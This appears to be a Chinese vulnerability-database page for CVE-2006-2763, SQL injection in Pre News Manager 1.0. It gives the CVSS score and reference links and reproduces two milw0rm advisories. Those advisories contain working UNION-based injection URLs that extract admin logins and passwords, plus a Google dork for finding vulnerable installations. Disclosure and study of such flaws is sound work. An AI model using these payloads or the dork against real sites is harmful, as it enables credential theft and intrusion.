CVE-2006-2763
CVSS6.4
发布时间 :2006-06-01 21:02:00
修订时间 :2011-03-07 21:36:58
NMCOE    

[原文]SQL injection vulnerability in Pre News Manager 1.0 allows remote attackers to execute arbitrary SQL commands via the (1) id parameter to (a) index.php, and the (2) nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php, and (g) send_comments.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. It is possible that this is primary to CVE-2006-2678.


[CNNVD]Pre News Manager 多个SQL注入漏洞(CNNVD-200606-019)

        Pre News Manager 1.0存在多个SQL注入漏洞。远程攻击者可以借助对(a)index.php的(1)id参数, 和对(b)news_detail.php, (c)email_story.php, (d)thankyou.php, (e)printable_view.php, (f)tella_friend.php和(g)send_comments.php的(2)nid参数,执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2763
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2763
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-019
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1990
(UNKNOWN)  VUPEN  ADV-2006-1990
http://www.securityfocus.com/archive/1/archive/1/497219/100/0/threaded
(UNKNOWN)  BUGTRAQ  20081009 Re: News Manager Remote SQL Injection Vulnerability
http://www.securityfocus.com/archive/1/archive/1/497185/100/0/threaded
(UNKNOWN)  BUGTRAQ  20081009 News Manager Remote SQL Injection Vulnerability
http://secunia.com/advisories/20284
(VENDOR_ADVISORY)  SECUNIA  20284
http://xforce.iss.net/xforce/xfdb/43070
(UNKNOWN)  XF  prenewsmanager-index-sql-injection(43070)
http://xforce.iss.net/xforce/xfdb/34035
(UNKNOWN)  XF  prenewsmanager-newsdetail-sql-injection(34035)
http://www.securityfocus.com/archive/1/archive/1/493369/100/0/threaded
(UNKNOWN)  BUGTRAQ  20080615 [ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability
http://www.osvdb.org/26079
(UNKNOWN)  OSVDB  26079
http://www.osvdb.org/26078
(UNKNOWN)  OSVDB  26078
http://www.osvdb.org/26077
(UNKNOWN)  OSVDB  26077
http://www.osvdb.org/26076
(UNKNOWN)  OSVDB  26076
http://www.osvdb.org/26075
(UNKNOWN)  OSVDB  26075
http://www.osvdb.org/26074
(UNKNOWN)  OSVDB  26074
http://www.osvdb.org/26073
(UNKNOWN)  OSVDB  26073
http://www.milw0rm.com/exploits/5803
(UNKNOWN)  MILW0RM  5803

- 漏洞信息

Pre News Manager 多个SQL注入漏洞
中危 SQL注入
2006-06-01 00:00:00 2006-06-01 00:00:00
远程  
        Pre News Manager 1.0存在多个SQL注入漏洞。远程攻击者可以借助对(a)index.php的(1)id参数, 和对(b)news_detail.php, (c)email_story.php, (d)thankyou.php, (e)printable_view.php, (f)tella_friend.php和(g)send_comments.php的(2)nid参数,执行任意SQL命令。

- 公告与补丁

        

- 漏洞信息 (3841)

Pre News Manager 1.0 Remote SQL Injection Vulnerability (EDBID:3841)
php webapps
2007-05-03 Verified
0 Mehmet Ince
N/A [点击下载]
==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================

# milw0rm.com [2007-05-03]
		

- 漏洞信息 (5803)

Pre News Manager <= 1.0 (index.php id) SQL Injection Vulnerability (EDBID:5803)
php webapps
2008-06-13 Verified
0 K-159
N/A [点击下载]
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

                                        .OR.ID
ECHO_ADV_97$2008

-----------------------------------------------------------------------------------------
[ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : June, 13 th 2008
Location       : Jakarta, Indonesia
Web            : http://e-rdc.org/v1/news.php?readmore=97
Critical Lvl   : Medium
Impact	       : System access
Where	       : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : Pre News Manager
version       : <= 1.0
Vendor        : http://www.preproject.com/news.asp
Description   :

Pre News Manager is online news publishing system. Very easy to manage and integration. Powerful online news management system with user friendly control panel. Include news box to any where in your website and integrate news manager in only one step. Upload latest news with images and advertisements. Include  HEADLINES page  to any where in your website and news will automatically updated to that page. Subscribe for latest and breaking news. Submit articles, news latest stories and many more. Add your own news categories. Also can be use for private news website. 
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "id" parameter in index.php page is not properly verified before being used to sql query. 
This can be exploited thru the browser and get password from admin in plain text.
Successful exploitation requires that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~

http://www.target.com/[path]/index.php?id=-1%20union%20select%201,2,3,concat(login,0x3a,password),5,6,7%20from%20admin--


Dork:
~~~~
Google    : "To enjoy our newletter please register with us !"


Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
 

Timeline:
~~~~~~~~

- 10 - 06 - 2008 bug found
- 13 - 06 - 2008 vendor contacted
- 13 - 06 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife, zautha my little warrior "happy birthday, dear"
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,kuntua,stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2008-06-13]
		

- 漏洞信息

26073
Pre News Manager index.php id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Third-party Verified

- 漏洞描述

Pre News Manager contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php not properly sanitizing user input supplied to the \'id\' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-24 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站